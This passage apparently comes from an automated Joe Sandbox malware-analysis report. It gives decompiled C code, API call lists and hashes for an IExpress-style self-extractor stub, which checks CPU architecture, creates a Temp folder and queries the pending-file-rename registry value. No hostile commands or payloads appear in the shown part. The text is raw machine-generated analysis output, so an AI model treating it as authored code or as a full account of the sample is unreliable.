                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        0x00de5472
                                                                                                                                                                                                        0x00de5479
                                                                                                                                                                                                        0x00de5481
                                                                                                                                                                                                        0x00de5484
                                                                                                                                                                                                        0x00de551c
                                                                                                                                                                                                        0x00de5521
                                                                                                                                                                                                        0x00de5528
                                                                                                                                                                                                        0x00de552d
                                                                                                                                                                                                        0x00de552f
                                                                                                                                                                                                        0x00de5539
                                                                                                                                                                                                        0x00de554d
                                                                                                                                                                                                        0x00de554d
                                                                                                                                                                                                        0x00de5552
                                                                                                                                                                                                        0x00de5585
                                                                                                                                                                                                        0x00de5585
                                                                                                                                                                                                        0x00de558b
                                                                                                                                                                                                        0x00de558d
                                                                                                                                                                                                        0x00de559d
                                                                                                                                                                                                        0x00de559d
                                                                                                                                                                                                        0x00de5557
                                                                                                                                                                                                        0x00de555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5560
                                                                                                                                                                                                        0x00de5566
                                                                                                                                                                                                        0x00de5569
                                                                                                                                                                                                        0x00de556f
                                                                                                                                                                                                        0x00de556f
                                                                                                                                                                                                        0x00de5581
                                                                                                                                                                                                        0x00de5581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5581
                                                                                                                                                                                                        0x00de5545
                                                                                                                                                                                                        0x00de557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de557c
                                                                                                                                                                                                        0x00de5547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5547
                                                                                                                                                                                                        0x00de548a
                                                                                                                                                                                                        0x00de5490
                                                                                                                                                                                                        0x00de5497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de549d
                                                                                                                                                                                                        0x00de54ab
                                                                                                                                                                                                        0x00de54b4
                                                                                                                                                                                                        0x00de54c0
                                                                                                                                                                                                        0x00de550c
                                                                                                                                                                                                        0x00de5511
                                                                                                                                                                                                        0x00de5515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5515
                                                                                                                                                                                                        0x00de54c9
                                                                                                                                                                                                        0x00de54d6
                                                                                                                                                                                                        0x00de54d8
                                                                                                                                                                                                        0x00de54fe
                                                                                                                                                                                                        0x00de5503
                                                                                                                                                                                                        0x00de5507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5507
                                                                                                                                                                                                        0x00de54da
                                                                                                                                                                                                        0x00de54dd
                                                                                                                                                                                                        0x00de54f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de54f7
                                                                                                                                                                                                        0x00de54df
                                                                                                                                                                                                        0x00de54e2
                                                                                                                                                                                                        0x00de54f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de54f0
                                                                                                                                                                                                        0x00de54e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de54e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE556F
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE53FB
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5402
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE541F
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE542B
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-994843058
                                                                                                                                                                                                        • Opcode ID: 570f9fd80fd797e71b3dd4f246880215e59b69aea935da5702de54fa19f71439
                                                                                                                                                                                                        • Instruction ID: f4f93751eaa85c7797e1b450027bd16a3238b2108e5ca46c061894a102700e46
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 570f9fd80fd797e71b3dd4f246880215e59b69aea935da5702de54fa19f71439
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E310A71700BD15BCB10BF2BBC8457EB79AEB913C8B48017AE445C674CDA70CE4586B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 519 de256d-de257d 520 de2622-de2627 call de24e0 519->520 521 de2583-de2589 519->521 528 de2629-de262f 520->528 523 de258b 521->523 524 de25e8-de2607 RegOpenKeyExA 521->524 523->528 529 de2591-de2595 523->529 525 de2609-de2620 RegQueryInfoKeyA 524->525 526 de25e3-de25e6 524->526 530 de25d1-de25dd RegCloseKey 525->530 526->528 529->528 531 de259b-de25ba RegOpenKeyExA 529->531 530->526 531->526 532 de25bc-de25cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00DE256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E00DE24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00de2572
                                                                                                                                                                                                        0x00de2573
                                                                                                                                                                                                        0x00de2575
                                                                                                                                                                                                        0x00de2578
                                                                                                                                                                                                        0x00de257d
                                                                                                                                                                                                        0x00de2627
                                                                                                                                                                                                        0x00de2583
                                                                                                                                                                                                        0x00de2586
                                                                                                                                                                                                        0x00de2589
                                                                                                                                                                                                        0x00de25eb
                                                                                                                                                                                                        0x00de2607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2609
                                                                                                                                                                                                        0x00de261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de258b
                                                                                                                                                                                                        0x00de258b
                                                                                                                                                                                                        0x00de259e
                                                                                                                                                                                                        0x00de25b2
                                                                                                                                                                                                        0x00de25ba
                                                                                                                                                                                                        0x00de25cb
                                                                                                                                                                                                        0x00de25d1
                                                                                                                                                                                                        0x00de25d6
                                                                                                                                                                                                        0x00de25da
                                                                                                                                                                                                        0x00de25dd
                                                                                                                                                                                                        0x00de25dd
                                                                                                                                                                                                        0x00de25e3
                                                                                                                                                                                                        0x00de25e3
                                                                                                                                                                                                        0x00de25e3
                                                                                                                                                                                                        0x00de258b
                                                                                                                                                                                                        0x00de2589
                                                                                                                                                                                                        0x00de262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00DE4096,00DE4096,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?), ref: 00DE25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00DE4096,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?,00DE4096), ref: 00DE25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?,00DE4096), ref: 00DE25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00DE4096,00DE4096,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?), ref: 00DE25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00DE4096,00000000,00000000,00000000,00000000,?,00DE1ED3,00000001,00000000), ref: 00DE261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00DE25A8
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00DE25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00DE25F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: c268b43742899757d90fbcb73909ecd315b70939485a565be01dc117206ad6c2
                                                                                                                                                                                                        • Instruction ID: 47c9bf739547e53e5c79cfdff9cf29b476911510bb4a79216d0f7968b95b64a6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c268b43742899757d90fbcb73909ecd315b70939485a565be01dc117206ad6c2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44116A359022A9BBDB20FB969C49DFFBE7CEB017A1F144155B808E2100DA709A48E6B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 533 de6a60-de6a91 call de7155 call de7208 GetStartupInfoW 539 de6a93-de6aa2 533->539 540 de6abc-de6abe 539->540 541 de6aa4-de6aa6 539->541 542 de6abf-de6ac5 540->542 543 de6aaf-de6aba Sleep 541->543 544 de6aa8-de6aad 541->544 545 de6ac7-de6acf _amsg_exit 542->545 546 de6ad1-de6ad7 542->546 543->539 544->542 547 de6b0b-de6b11 545->547 548 de6ad9-de6ae9 call de6c3f 546->548 549 de6b05 546->549 551 de6b2e-de6b30 547->551 552 de6b13-de6b24 _initterm 547->552 553 de6aee-de6af2 548->553 549->547 554 de6b3b-de6b42 551->554 555 de6b32-de6b39 551->555 552->551 553->547 556 de6af4-de6b00 553->556 557 de6b67-de6b71 554->557 558 de6b44-de6b51 call de7060 554->558 555->554 561 de6c39-de6c3e call de724d 556->561 560 de6b74-de6b79 557->560 558->557 566 de6b53-de6b65 558->566 563 de6b7b-de6b7d 560->563 564 de6bc5-de6bc8 560->564 569 de6b7f-de6b81 563->569 570 de6b94-de6b98 563->570 567 de6bca-de6bd3 564->567 568 de6bd6-de6be3 _ismbblead 564->568 566->557 567->568 572 de6be9-de6bed 568->572 573 de6be5-de6be6 568->573 569->564 574 de6b83-de6b85 569->574 575 de6b9a-de6b9e 570->575 576 de6ba0-de6ba2 570->576 572->560 573->572 574->570 579 de6b87-de6b8a 574->579 577 de6ba3-de6bbc call de2bfb 575->577 576->577 583 de6c1e-de6c25 577->583 584 de6bbe-de6bbf exit 577->584 579->570 581 de6b8c-de6b92 579->581 581->574 585 de6c27-de6c2d _cexit 583->585 586 de6c32 583->586 584->564 585->586 586->561
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00DE7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xde72b8);
                                                                                                                                                                                                        				E00DE7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xde88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xde88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xde81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xde88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00DE6C3F(0xde10b8, 0xde10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00DE6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xde88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xde10b4);
                                                                                                                                                                                                        							_push(0xde10ac);
                                                                                                                                                                                                        							L00DE7202();
                                                                                                                                                                                                        							 *0xde88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xde88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xde88b4;
                                                                                                                                                                                                        						if( *0xde88b4 != 0 && E00DE7060(_t71, 0xde88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xde88b4; // 0x0
                                                                                                                                                                                                        							 *0xdea288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00DE2BFB(0xde0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xde81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xde81f8;
                                                                                                                                                                                                        							if( *0xde81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xde81e4;
                                                                                                                                                                                                        							if( *0xde81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xde81e0; // 0x0
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E00DE724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00de6a60
                                                                                                                                                                                                        0x00de6a6a
                                                                                                                                                                                                        0x00de6a6c
                                                                                                                                                                                                        0x00de6a71
                                                                                                                                                                                                        0x00de6a78
                                                                                                                                                                                                        0x00de6a7f
                                                                                                                                                                                                        0x00de6a85
                                                                                                                                                                                                        0x00de6a8e
                                                                                                                                                                                                        0x00de6a91
                                                                                                                                                                                                        0x00de6a93
                                                                                                                                                                                                        0x00de6a9c
                                                                                                                                                                                                        0x00de6aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6aa6
                                                                                                                                                                                                        0x00de6ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6aa8
                                                                                                                                                                                                        0x00de6aaa
                                                                                                                                                                                                        0x00de6aab
                                                                                                                                                                                                        0x00de6aab
                                                                                                                                                                                                        0x00de6abf
                                                                                                                                                                                                        0x00de6abf
                                                                                                                                                                                                        0x00de6ac5
                                                                                                                                                                                                        0x00de6ad1
                                                                                                                                                                                                        0x00de6ad7
                                                                                                                                                                                                        0x00de6b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6ad9
                                                                                                                                                                                                        0x00de6ad9
                                                                                                                                                                                                        0x00de6ae9
                                                                                                                                                                                                        0x00de6af0
                                                                                                                                                                                                        0x00de6af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6af4
                                                                                                                                                                                                        0x00de6af4
                                                                                                                                                                                                        0x00de6afb
                                                                                                                                                                                                        0x00de6afb
                                                                                                                                                                                                        0x00de6af2
                                                                                                                                                                                                        0x00de6ac7
                                                                                                                                                                                                        0x00de6ac7
                                                                                                                                                                                                        0x00de6ac9
                                                                                                                                                                                                        0x00de6b0b
                                                                                                                                                                                                        0x00de6b0b
                                                                                                                                                                                                        0x00de6b11
                                                                                                                                                                                                        0x00de6b13
                                                                                                                                                                                                        0x00de6b18
                                                                                                                                                                                                        0x00de6b1d
                                                                                                                                                                                                        0x00de6b24
                                                                                                                                                                                                        0x00de6b24
                                                                                                                                                                                                        0x00de6b30
                                                                                                                                                                                                        0x00de6b39
                                                                                                                                                                                                        0x00de6b39
                                                                                                                                                                                                        0x00de6b3b
                                                                                                                                                                                                        0x00de6b42
                                                                                                                                                                                                        0x00de6b57
                                                                                                                                                                                                        0x00de6b5f
                                                                                                                                                                                                        0x00de6b65
                                                                                                                                                                                                        0x00de6b65
                                                                                                                                                                                                        0x00de6b67
                                                                                                                                                                                                        0x00de6b6c
                                                                                                                                                                                                        0x00de6b6e
                                                                                                                                                                                                        0x00de6b71
                                                                                                                                                                                                        0x00de6b74
                                                                                                                                                                                                        0x00de6b74
                                                                                                                                                                                                        0x00de6b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6b7d
                                                                                                                                                                                                        0x00de6b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6b83
                                                                                                                                                                                                        0x00de6b8c
                                                                                                                                                                                                        0x00de6b8d
                                                                                                                                                                                                        0x00de6b90
                                                                                                                                                                                                        0x00de6b90
                                                                                                                                                                                                        0x00de6b83
                                                                                                                                                                                                        0x00de6b81
                                                                                                                                                                                                        0x00de6b94
                                                                                                                                                                                                        0x00de6b98
                                                                                                                                                                                                        0x00de6ba2
                                                                                                                                                                                                        0x00de6b9a
                                                                                                                                                                                                        0x00de6b9a
                                                                                                                                                                                                        0x00de6b9a
                                                                                                                                                                                                        0x00de6ba3
                                                                                                                                                                                                        0x00de6bab
                                                                                                                                                                                                        0x00de6bb0
                                                                                                                                                                                                        0x00de6bb5
                                                                                                                                                                                                        0x00de6bbc
                                                                                                                                                                                                        0x00de6bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6bbf
                                                                                                                                                                                                        0x00de6c1e
                                                                                                                                                                                                        0x00de6c25
                                                                                                                                                                                                        0x00de6c27
                                                                                                                                                                                                        0x00de6c2d
                                                                                                                                                                                                        0x00de6c2d
                                                                                                                                                                                                        0x00de6c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6bc5
                                                                                                                                                                                                        0x00de6bc5
                                                                                                                                                                                                        0x00de6bc8
                                                                                                                                                                                                        0x00de6bcc
                                                                                                                                                                                                        0x00de6bce
                                                                                                                                                                                                        0x00de6bce
                                                                                                                                                                                                        0x00de6bd1
                                                                                                                                                                                                        0x00de6bd3
                                                                                                                                                                                                        0x00de6bd3
                                                                                                                                                                                                        0x00de6bd6
                                                                                                                                                                                                        0x00de6bda
                                                                                                                                                                                                        0x00de6be1
                                                                                                                                                                                                        0x00de6be3
                                                                                                                                                                                                        0x00de6be5
                                                                                                                                                                                                        0x00de6be5
                                                                                                                                                                                                        0x00de6be6
                                                                                                                                                                                                        0x00de6be6
                                                                                                                                                                                                        0x00de6be9
                                                                                                                                                                                                        0x00de6bea
                                                                                                                                                                                                        0x00de6bea
                                                                                                                                                                                                        0x00de6b74
                                                                                                                                                                                                        0x00de6c39
                                                                                                                                                                                                        0x00de6c3e
                                                                                                                                                                                                        0x00de6c3e
                                                                                                                                                                                                        0x00de6abe
                                                                                                                                                                                                        0x00de6abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00DE7182
